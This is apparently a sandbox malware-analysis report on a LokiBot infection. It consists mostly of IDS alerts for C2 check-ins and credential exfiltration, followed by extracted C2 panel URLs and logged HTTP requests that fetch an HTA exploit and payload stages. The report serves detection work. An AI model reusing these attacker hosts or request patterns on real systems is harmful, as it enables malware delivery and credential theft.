                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49181 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49205 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49205 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49181 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49181 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49179
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49202 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49185 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49202 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49185 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49181
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49194 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49194 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49205
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49194 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49202
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49184 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49172 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49200 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49184 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49180 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49180 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49204 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49200 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49174
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49172 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49204 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49200 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49193 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49194 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49193 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49198 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49193 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49196 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49198 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49172 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49183 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49194 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49184 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49196 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49184 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49180 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49178 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49175 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49178 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49198 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49197 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49183 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49175 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49197 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49197 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49180 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49200 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49187 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49184
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49172 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49190
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49175 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49197 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49193 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49200 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49196
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49180 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49178
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49194
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49186 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49204
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49186 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49186 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49175 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49175 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49180
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49198 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49187 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49198 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49187 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49183 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49186 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49193 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49186 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49191 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49175
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49197 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49185
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49176 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49176 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49187 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49197
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49186
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49187 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49176 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49183 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49198
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49183 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49200
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49176 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49176 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49189 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49201 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49189 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49201 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49189 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49173 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49187
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49173 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49183
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49173 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49176
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49193
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49199 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49173 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49199 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49173 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49199 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49191 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49188 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49191 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49201 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49188 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49182 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49199 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49188 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49182 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49182 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49192 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49189 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49192 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49199 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49201 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49189 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49192 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49173
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49201 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49188 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49195 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49188 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49195 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49182 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49195 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49182 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49192 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49199
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49191 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49171 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49171 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49171 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49195 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49201
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49191 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49192 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49188
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49182
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49189
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49171 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49195 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49203 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49191
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49192
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49195
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49203 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49203 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49203 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49203 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49203
                Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 172.217.16.193:443 -> 192.168.2.22:49169
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs:
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /35/SMLPERR.txt HTTP/1.1Host: 192.3.176.141Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 192.3.176.141 192.3.176.141
                Source: Joe Sandbox ViewIP Address: 94.156.177.220 94.156.177.220
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 192.3.176.141:80
                Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficHTTP traffic detected: GET /ZDFWtO HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mpa.liConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /ZDFWtO HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mpa.liConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.141Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.176.141If-Range: "20a11-6252e32d56015"
